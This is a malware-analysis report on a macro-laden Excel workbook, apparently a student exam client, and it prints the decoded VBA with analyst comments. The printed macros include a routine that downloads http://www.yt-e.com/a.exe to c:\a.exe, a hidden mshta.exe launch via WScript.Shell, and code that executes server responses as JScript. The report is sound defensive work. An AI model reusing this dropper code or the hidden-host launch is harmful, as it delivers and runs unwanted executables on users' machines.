Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ab73193dd1f250ae…

MALICIOUS

Office (OOXML)

124.1 KB Created: 2019-06-14 06:21:10 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-04-01
MD5: 61f9d9f8936cd4fb32b8cea608a9eee7 SHA-1: 4b37914596f6cb60710ea34aeee95f116806039e SHA-256: ab73193dd1f250aeaae35c68e27ad0b2c22a516eda2a27b330affad18c050913
422 Risk Score

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
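    LOLBin reference in VBA: the matched line launches the 32-bit mshta.exe (%systemroot%\syswow64) with a hidden window and inline about: markup. The same statement, in CreateWindow(), also produced the OLE_VBA_SHELL and OLE_VBA_WSCRIPT findings above, so these three critical findings describe one line of code.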
    Matched line in script
        CreateObject("WScript.Shell").Run "%systemroot%\syswow64\mshta.exe about:""about:<head><script>moveTo(-32000,-32000);document.title='x86Host'</script><hta:application showintaskbar=no /><object id='shell' classid='clsid:8856F961-340A-11D0-A96B-00C04FD705A2'><param name=RegisterAsBrowser value=1></object><script>shell.putproperty('" & sSignature & "',document.parentWindow);</script></head>""", 0, False
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
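    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. In the previewed script the pattern occurs twice: Download() saves a fixed URL to c:\a.exe, and CaoZuo() saves server-named files under d:\exam\. The ProgIDs in this sample are plain string literals, and the preview shows no auto-exec handler (Workbook_Open/Auto_Open) and no statement that launches the saved file, so how Download() is triggered should be confirmed from the workbook's buttons/shapes or from dynamic analysis.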
    Matched line in script
        s.Write H.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set H = CreateObject("Microsoft.XMLHTTP")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.yt-e.com/a.exe Referenced by macro (fetched over plain HTTP by Download() and saved as c:\a.exe)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 27935 bytes
SHA-256: a4a431708675c5a19d9a9697b52cd230a9a1183d2fb1a5d1ca5776835ed7c54b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Analyst note: fetches a fixed remote executable over plain HTTP and writes it to disk.
' Both the URL and the destination path are hard-coded. Nothing in this procedure runs
' the saved file, and no other procedure in this listing calls Download by name.
' Detection: an Office process issuing an HTTP GET for an .exe and writing c:\a.exe.
Sub Download()
    Dim H, s
    Set H = CreateObject("Microsoft.XMLHTTP")
    ' Third argument False = synchronous request; Send returns once the body is received.
    H.Open "GET", "http://www.yt-e.com/a.exe", False
    H.Send
    Set s = CreateObject("ADODB.Stream")
    ' 1 = adTypeBinary: the response is handled as raw bytes.
    s.Type = 1
    s.Open
    s.Write H.ResponseBody
    ' 2 = adSaveCreateOverWrite: an existing c:\a.exe is replaced.
    s.SaveToFile "c:\a.exe", 2
    s.Close
End Sub


' Student-side "start exam" routine.
' Requires the name (C7), student ID (C10), class (C13) and exam ID (C16) cells to be filled in,
' refreshes the exam state through FlushExamInfo, and calls GetQuestion only when the state
' cell L19 on sheet "开始" ("Start") reads "考试开始" ("exam started").
Sub StartExam()
    StudentName = Range("C7").Value
    Studentid = Range("C10").Value
    StudentClass = Range("C13").Value
    ExamID = Range("C16").Value
    ' StrComp(x, "", 1) = 0 is a text-mode comparison that is true when the cell is empty.
    If StrComp(StudentName, "", 1) = 0 Then
        MsgBox "请输入正确的姓名!" ' "Please enter a valid name!"
    ElseIf StrComp(Studentid, "", 1) = 0 Then
        MsgBox "请输入正确的学号!" ' "Please enter a valid student ID!"
    ElseIf StrComp(StudentClass, "", 1) = 0 Then
        MsgBox "请输入正确的班级!" ' "Please enter a valid class!"
    ElseIf StrComp(ExamID, "", 1) = 0 Then
        MsgBox "请输入正确的考试ID!" ' "Please enter a valid exam ID!"
    Else
        ' FlushExamInfo writes the server-reported state into 开始!L19, which is read back here.
        FlushExamInfo
        Status = Sheets("开始").Range("L19").Value
        If StrComp(Status, "无考试", 1) = 0 Then ' "no exam"
            MsgBox "当前无考试" ' "There is currently no exam"
        ElseIf StrComp(Status, "考试未开始", 1) = 0 Then ' "exam not started"
            MsgBox "当前考试未开始" ' "The exam has not started yet"
        ElseIf StrComp(Status, "考试结束", 1) = 0 Then ' "exam ended"
            MsgBox "当前考试已经结束" ' "The exam has already ended"
        ElseIf StrComp(Status, "考试开始", 1) = 0 Then ' "exam started"
            GetQuestion
            MsgBox "考题获取成功,开始考试!" ' "Questions fetched successfully, start the exam!"
        End If
    End If
End Sub

' Connectivity check against the exam server.
' The host is read from cell C19 of sheet "开始" ("Start"); a synchronous POST goes to
' /connectTest and a success message is shown when the body is exactly "success".
' NOTE(review): the destination is whatever the worksheet cell contains, and the request is plain HTTP.
Sub ConnectServer()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/connectTest"
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    ' Third argument False = synchronous request.
    xmlhttp.Open "POST", Url, False
    ' The header value is sent exactly as written (note the "from-urlencode" spelling).
    xmlhttp.SetRequestHeader "Content-Type", "application/x-www-from-urlencode;charset=UTF-8"
    xmlhttp.Send "test=test"
    ' readyState 4 = request complete; with a synchronous Send this loop should not need to spin.
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    If xmlhttp.ResponseText = "success" Then
        MsgBox "连接考试服务器成功!" ' "Connected to the exam server successfully!"
    End If
    Set xmlhttp = Nothing
End Sub

' Refreshes the exam name and state from the server.
' POSTs to /GetInfo on the host in 开始!C19, splits the response text by hand on "," and ":",
' and copies the "name" value into 开始!A1 and the "state" value into 开始!L19.
' StartExam and SbmitExam read L19 afterwards to decide what to do.
Sub FlushExamInfo()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetInfo"
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "POST", Url, False
    xmlhttp.SetRequestHeader "Content-Type", "application/x-www-from-urlencode;charset=UTF-8"
    xmlhttp.Send "test=test"
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Dim i As Integer
    ' Each comma-separated piece is treated as one key:value pair.
    temp = Split(xmlhttp.ResponseText, ",")
    For i = 0 To UBound(temp)
        temp1 = Split(temp(i), ":")
        Dim j As Integer
        ' The body never uses j, so the same check is simply repeated for each element of temp1.
        For j = 0 To UBound(temp1)
            ' "name" is only recognised with a leading "{", i.e. when it is the first key in the response.
            If StrComp(temp1(0), "{""name""", 1) = 0 Then
                ' Quotes and a closing brace are stripped before the value is stored.
                Sheets("开始").Range("A1").Value = Replace(Replace(temp1(1), """", ""), "}", "")
            ElseIf StrComp(temp1(0), """state""", 1) = 0 Then
                Sheets("开始").Range("L19").Value = Replace(Replace(temp1(1), """", ""), "}", "")
            End If
        Next j
    Next i
End Sub

' Asks the server to check the student ID in 开始!C10.
' Sends GET /CheckStudent?id=<C10>&test=<random 1..99999> and shows the text after the
' first ":" of the response, with "}" removed, in a message box.
Sub CheckID()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/CheckStudent?"
    ' The cell value is appended as-is; no URL encoding is applied.
    Url = Url & "id=" & Sheets("开始").Range("C10").Value
    ' Random "test" value - presumably a cache-buster; confirm against the server side.
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    ' temp(1) is read without checking that the response contained a ":".
    temp = Split(xmlhttp.ResponseText, ":")
    MsgBox Replace(temp(1), "}", "")
    Set xmlhttp = Nothing
End Sub

' Fetches every question type from the server by calling the five per-type routines in order.
Sub GetQuestion()
    ' Fetch multiple-choice questions
    Xuanze
    ' Fetch fill-in-the-blank questions
    TianKong
    ' Fetch true/false questions
    PanDuan
    ' Fetch short-answer questions
    JianDa
    ' Fetch hands-on (operation) questions; this routine also saves files to disk
    CaoZuo
End Sub

' Fetches multiple-choice questions (type=0) and writes them to sheet "选择题" ("multiple choice").
' Each question takes two rows: label and title first, then the choices in column B of the next row.
' NOTE(review): the HTTP response text is concatenated into JScript source and compiled by a
' ScriptControl, so the server's reply is treated as code rather than parsed as data.
Sub Xuanze()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=0"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    ' CreateObjectx86 supplies the ScriptControl (via a 32-bit mshta host on 64-bit VBA).
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    ' The response becomes the initialiser of a JScript variable named query.
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        QuestionNumber = sc.Eval("query[" & i & "].number")
        QuestionTitle = sc.Eval("query[" & i & "].title")
        QuestionChoice = sc.Eval("query[" & i & "].choice")
        Sheets("选择题").Range("A" & QuestionRow).Value = "选择题" & QuestionNumber
        Sheets("选择题").Range("B" & QuestionRow).Value = QuestionTitle
        QuestionRow = QuestionRow + 1
        Sheets("选择题").Range("B" & QuestionRow).Value = QuestionChoice
        QuestionRow = QuestionRow + 1
    Next i
End Sub

' Fetches fill-in-the-blank questions (type=2) and writes one row per question
' to sheet "填空题" ("fill in the blank"), starting at row 2.
' NOTE(review): the HTTP response text is compiled as JScript by the ScriptControl (AddCode),
' so the server's reply is treated as code rather than parsed as data.
Sub TianKong()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=2"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    ' The response becomes the initialiser of a JScript variable named query.
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        QuestionNumber = sc.Eval("query[" & i & "].number")
        QuestionTitle = sc.Eval("query[" & i & "].title")
        Sheets("填空题").Range("A" & QuestionRow).Value = "填空题" & QuestionNumber
        Sheets("填空题").Range("B" & QuestionRow).Value = QuestionTitle
        QuestionRow = QuestionRow + 1
    Next i
End Sub

' Fetches true/false questions (type=1) and writes one row per question
' to sheet "判断题" ("true/false"), starting at row 2.
' NOTE(review): the HTTP response text is compiled as JScript by the ScriptControl (AddCode),
' so the server's reply is treated as code rather than parsed as data.
Sub PanDuan()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=1"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    ' The response becomes the initialiser of a JScript variable named query.
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        QuestionNumber = sc.Eval("query[" & i & "].number")
        QuestionTitle = sc.Eval("query[" & i & "].title")
        Sheets("判断题").Range("A" & QuestionRow).Value = "判断题" & QuestionNumber
        Sheets("判断题").Range("B" & QuestionRow).Value = QuestionTitle
        QuestionRow = QuestionRow + 1
    Next i
End Sub

' Fetches short-answer questions (type=3) and writes one row per question
' to sheet "简答题" ("short answer"), starting at row 2.
' NOTE(review): the HTTP response text is compiled as JScript by the ScriptControl (AddCode),
' so the server's reply is treated as code rather than parsed as data.
Sub JianDa()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=3"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    ' The response becomes the initialiser of a JScript variable named query.
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        QuestionNumber = sc.Eval("query[" & i & "].number")
        QuestionTitle = sc.Eval("query[" & i & "].title")
        Sheets("简答题").Range("A" & QuestionRow).Value = "简答题" & QuestionNumber
        Sheets("简答题").Range("B" & QuestionRow).Value = QuestionTitle
        QuestionRow = QuestionRow + 1
    Next i
End Sub

' Fetches hands-on questions (type=4), writes them to sheet "操作题" ("hands-on"), and for each
' question downloads the file named in its "answer" field into d:\exam\.
' NOTE(review): two things matter for triage here. The HTTP response is compiled as JScript
' (AddCode), and the server-supplied "answer" string is used unvalidated both as the /GetFile
' parameter and as the local file name, so the server decides what is written and under what name.
' Detection: an Office process writing files under d:\exam\ after HTTP GETs to /GetFile.
Sub CaoZuo()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=4"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    ' The response becomes the initialiser of a JScript variable named query.
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    For i = 0 To QuestionCount - 1
        QuestionNumber = sc.Eval("query[" & i & "].number")
        QuestionTitle = sc.Eval("query[" & i & "].title")
        ' The "answer" field is used as a file name below.
        QuestionAsset = sc.Eval("query[" & i & "].answer")
        Sheets("操作题").Range("A" & QuestionRow).Value = "操作题" & QuestionNumber
        Sheets("操作题").Range("B" & QuestionRow).Value = QuestionTitle
        Sheets("操作题").Range("C" & QuestionRow).Value = QuestionAsset
        QuestionRow = QuestionRow + 1
        ' Same download-to-disk sequence as Download(), but with a server-chosen name.
        Dim H, s
        Set H = CreateObject("Microsoft.XMLHTTP")
        H.Open "GET", "http://" & IP + "/GetFile?file=" & QuestionAsset, False
        H.Send
        Set s = CreateObject("ADODB.Stream")
        ' 1 = adTypeBinary
        s.Type = 1
        s.Open
        s.Write H.ResponseBody
        ' 2 = adSaveCreateOverWrite: an existing file of the same name is replaced.
        s.SaveToFile "d:\exam\" & QuestionAsset, 2
        s.Close
    Next i
End Sub

' Student-side "submit exam" routine.
' Performs the same field and state checks as StartExam, then runs the four Correct* routines,
' which grade the answers locally and send them to the server.
Sub SbmitExam()
    StudentName = Range("C7").Value
    Studentid = Range("C10").Value
    StudentClass = Range("C13").Value
    ExamID = Range("C16").Value
    ' StrComp(x, "", 1) = 0 is a text-mode comparison that is true when the cell is empty.
    If StrComp(StudentName, "", 1) = 0 Then
        MsgBox "请输入正确的姓名!" ' "Please enter a valid name!"
    ElseIf StrComp(Studentid, "", 1) = 0 Then
        MsgBox "请输入正确的学号!" ' "Please enter a valid student ID!"
    ElseIf StrComp(StudentClass, "", 1) = 0 Then
        MsgBox "请输入正确的班级!" ' "Please enter a valid class!"
    ElseIf StrComp(ExamID, "", 1) = 0 Then
        MsgBox "请输入正确的考试ID!" ' "Please enter a valid exam ID!"
    Else
        ' FlushExamInfo writes the server-reported state into 开始!L19, which is read back here.
        FlushExamInfo
        Status = Sheets("开始").Range("L19").Value
        If StrComp(Status, "无考试", 1) = 0 Then ' "no exam"
            MsgBox "当前无考试" ' "There is currently no exam"
        ElseIf StrComp(Status, "考试未开始", 1) = 0 Then ' "exam not started"
            MsgBox "当前考试未开始" ' "The exam has not started yet"
        ElseIf StrComp(Status, "考试结束", 1) = 0 Then ' "exam ended"
            MsgBox "当前考试已经结束" ' "The exam has already ended"
        ElseIf StrComp(Status, "考试开始", 1) = 0 Then ' "exam started"
            ' Disabled in the original: would have hidden the Start sheet on submission.
            'Sheets("开始").Visible = False
            CorrectXuanZe
            CorrectPanDuan
            CorrectTianKong
            CorrectJianDa
            ' "Paper submitted successfully; you can now return to the answer area to review wrong answers!"
            MsgBox "试卷提交成功,现在你可以回到作答区查看错题情况!"
        End If
    End If
End Sub

' Grades the multiple-choice section (type=0) on the client and reports the result.
' Re-fetches the questions with their answers, compares each against column C of sheet "选择题",
' colours the cell, then sends the joined answers and the count of correct ones to /SetAnswer.
' NOTE(review): the HTTP response text is compiled as JScript by the ScriptControl (AddCode).
' The correct answers and the score both pass through the client.
Sub CorrectXuanZe()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=0"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    StudentAnswerStr = ""
    RightCount = 0
    For i = 0 To QuestionCount - 1
        QuestionAnswer = sc.Eval("query[" & i & "].answer")
        StudentAnswer = Sheets("选择题").Range("C" & QuestionRow).Value
        ' Answers are joined with the separator "|@|".
        If i = 0 Then
            StudentAnswerStr = StudentAnswer
        Else
            StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
        End If
        If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
            RightCount = RightCount + 1
            ' 5287936 = RGB(0, 176, 80), green: correct
            Sheets("选择题").Range("C" & QuestionRow).Interior.Color = 5287936
        Else
            ' 65535 = RGB(255, 255, 0), yellow: incorrect
            Sheets("选择题").Range("C" & QuestionRow).Interior.Color = 65535
        End If
        ' Step of 2 matches the two-rows-per-question layout written by Xuanze.
        QuestionRow = QuestionRow + 2
    Next i
    
    ' Answers and score are sent as GET query parameters, appended without URL encoding.
    Url1 = "http://" & IP & "/SetAnswer?"
    Url1 = Url1 & "&type=0"
    Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
    Url1 = Url1 & "&answer=" & StudentAnswerStr
    Url1 = Url1 & "&mark=" & RightCount
    Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
    Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
    xmlhttp1.Open "GET", Url1, False
    xmlhttp1.Send
    Do While xmlhttp1.readyState <> 4
        DoEvents
    Loop
End Sub

' Grades the true/false section (type=1) on the client and reports the result.
' Re-fetches the questions with their answers, compares each against column C of sheet "判断题",
' colours the cell, then sends the joined answers and the count of correct ones to /SetAnswer.
' NOTE(review): the HTTP response text is compiled as JScript by the ScriptControl (AddCode).
' The correct answers and the score both pass through the client.
Sub CorrectPanDuan()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=1"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    StudentAnswerStr = ""
    RightCount = 0
    For i = 0 To QuestionCount - 1
        QuestionAnswer = sc.Eval("query[" & i & "].answer")
        StudentAnswer = Sheets("判断题").Range("C" & QuestionRow).Value
        ' Answers are joined with the separator "|@|".
        If i = 0 Then
            StudentAnswerStr = StudentAnswer
        Else
            StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
        End If
        If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
            RightCount = RightCount + 1
            ' 5287936 = RGB(0, 176, 80), green: correct
            Sheets("判断题").Range("C" & QuestionRow).Interior.Color = 5287936
        Else
            ' 65535 = RGB(255, 255, 0), yellow: incorrect
            Sheets("判断题").Range("C" & QuestionRow).Interior.Color = 65535
        End If
        QuestionRow = QuestionRow + 1
    Next i
    
    ' Answers and score are sent as GET query parameters, appended without URL encoding.
    Url1 = "http://" & IP & "/SetAnswer?"
    Url1 = Url1 & "&type=1"
    Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
    Url1 = Url1 & "&answer=" & StudentAnswerStr
    Url1 = Url1 & "&mark=" & RightCount
    Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
    Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
    xmlhttp1.Open "GET", Url1, False
    xmlhttp1.Send
    Do While xmlhttp1.readyState <> 4
        DoEvents
    Loop
End Sub

' Grades the fill-in-the-blank section (type=2) on the client and reports the result.
' Re-fetches the questions with their answers, compares each against column C of sheet "填空题",
' colours the cell, then sends the joined answers and the count of correct ones to /SetAnswer.
' NOTE(review): the HTTP response text is compiled as JScript by the ScriptControl (AddCode).
' The correct answers and the score both pass through the client.
Sub CorrectTianKong()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=2"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    StudentAnswerStr = ""
    RightCount = 0
    For i = 0 To QuestionCount - 1
        QuestionAnswer = sc.Eval("query[" & i & "].answer")
        StudentAnswer = Sheets("填空题").Range("C" & QuestionRow).Value
        ' Answers are joined with the separator "|@|".
        If i = 0 Then
            StudentAnswerStr = StudentAnswer
        Else
            StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
        End If
        If StrComp(QuestionAnswer, StudentAnswer, 1) = 0 Then
            RightCount = RightCount + 1
            ' 5287936 = RGB(0, 176, 80), green: correct
            Sheets("填空题").Range("C" & QuestionRow).Interior.Color = 5287936
        Else
            ' 65535 = RGB(255, 255, 0), yellow: incorrect
            Sheets("填空题").Range("C" & QuestionRow).Interior.Color = 65535
        End If
        QuestionRow = QuestionRow + 1
    Next i
    
    ' Answers and score are sent as GET query parameters, appended without URL encoding.
    Url1 = "http://" & IP & "/SetAnswer?"
    Url1 = Url1 & "&type=2"
    Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
    Url1 = Url1 & "&answer=" & StudentAnswerStr
    Url1 = Url1 & "&mark=" & RightCount
    Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
    Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
    xmlhttp1.Open "GET", Url1, False
    xmlhttp1.Send
    Do While xmlhttp1.readyState <> 4
        DoEvents
    Loop
End Sub

' Submits the short-answer section (type=3) without grading it.
' Collects column C of sheet "简答题", joins the answers with "|@|", and sends them to
' /SetAnswer with a fixed mark of -1.
' NOTE(review): the HTTP response text is compiled as JScript by the ScriptControl (AddCode).
Sub CorrectJianDa()
    IP = Sheets("开始").Range("C19").Value
    Url = "http://" & IP + "/GetQuestion?"
    Url = Url & "&type=3"
    Url = Url & "&id=" & Sheets("开始").Range("C10").Value
    Url = Url & "&test=" & Int((99999 * Rnd) + 1)
    Dim xmlhttp As Object
    Set xmlhttp = CreateObject("MSXML2.XMLHTTP")
    xmlhttp.Open "GET", Url, False
    xmlhttp.Send
    Do While xmlhttp.readyState <> 4
        DoEvents
    Loop
    
    Set sc = CreateObjectx86("ScriptControl"): sc.Language = "JScript"
    sc.AddCode ("var query = " & xmlhttp.ResponseText)
    QuestionCount = sc.Eval("query.length")
    QuestionRow = 2
    StudentAnswerStr = ""
    For i = 0 To QuestionCount - 1
        ' QuestionAnswer is fetched but not used afterwards in this routine.
        QuestionAnswer = sc.Eval("query[" & i & "].answer")
        StudentAnswer = Sheets("简答题").Range("C" & QuestionRow).Value
        If i = 0 Then
            StudentAnswerStr = StudentAnswer
        Else
            StudentAnswerStr = StudentAnswerStr + "|@|" + StudentAnswer
        End If
        QuestionRow = QuestionRow + 1
    Next i
    
    ' Answers are sent as GET query parameters, appended without URL encoding.
    Url1 = "http://" & IP & "/SetAnswer?"
    Url1 = Url1 & "&type=3"
    Url1 = Url1 & "&id=" & Sheets("开始").Range("C10").Value
    Url1 = Url1 & "&answer=" & StudentAnswerStr
    ' mark=-1 is a fixed value - presumably "not graded yet"; confirm against the server side.
    Url1 = Url1 & "&mark=-1"
    Url1 = Url1 & "&test=" & Int((99999 * Rnd) + 1)
    Set xmlhttp1 = CreateObject("MSXML2.XMLHTTP")
    xmlhttp1.Open "GET", Url1, False
    xmlhttp1.Send
    Do While xmlhttp1.readyState <> 4
        DoEvents
    Loop
End Sub

' Returns a COM object created inside a 32-bit host when the VBA runtime is 64-bit.
'   sProgID - ProgID to instantiate (used only in the Win64 branch).
'   bClose  - when True, closes the cached host window and returns without creating anything.
' On 64-bit VBA the object is created by a VBScript helper injected into the window returned
' by CreateWindow (an mshta.exe process started from syswow64). On 32-bit VBA, sProgID is
' ignored and a MSScriptControl.ScriptControl is created directly.
' Presumably a workaround for ScriptControl being unavailable to 64-bit processes - confirm.
Function CreateObjectx86(Optional sProgID, Optional bClose = False)
    ' Static: the host window reference survives between calls, so the host is started only once.
    Static oWnd As Object
    Dim bRunning As Boolean
    #If Win64 Then
        ' The host counts as alive while oWnd still reports an HTMLWindow type name.
        bRunning = InStr(TypeName(oWnd), "HTMLWindow") > 0
        If bClose Then
            If bRunning Then oWnd.Close
            Exit Function
        End If
        If Not bRunning Then
            Set oWnd = CreateWindow()
            ' Defines a VBScript function inside the host that calls CreateObject there.
            oWnd.execScript "Function CreateObjectx86(sProgID): Set CreateObjectx86 = CreateObject(sProgID): End Function", "VBScript"
        End If
        Set CreateObjectx86 = oWnd.CreateObjectx86(sProgID)
    #Else
        Set CreateObjectx86 = CreateObject("MSScriptControl.ScriptControl")
    #End If
End Function


' Starts a hidden mshta.exe from syswow64 and returns its HTML window object.
' This is the single statement behind the OLE_VBA_SHELL, OLE_VBA_WSCRIPT and OLE_VBA_LOLBIN
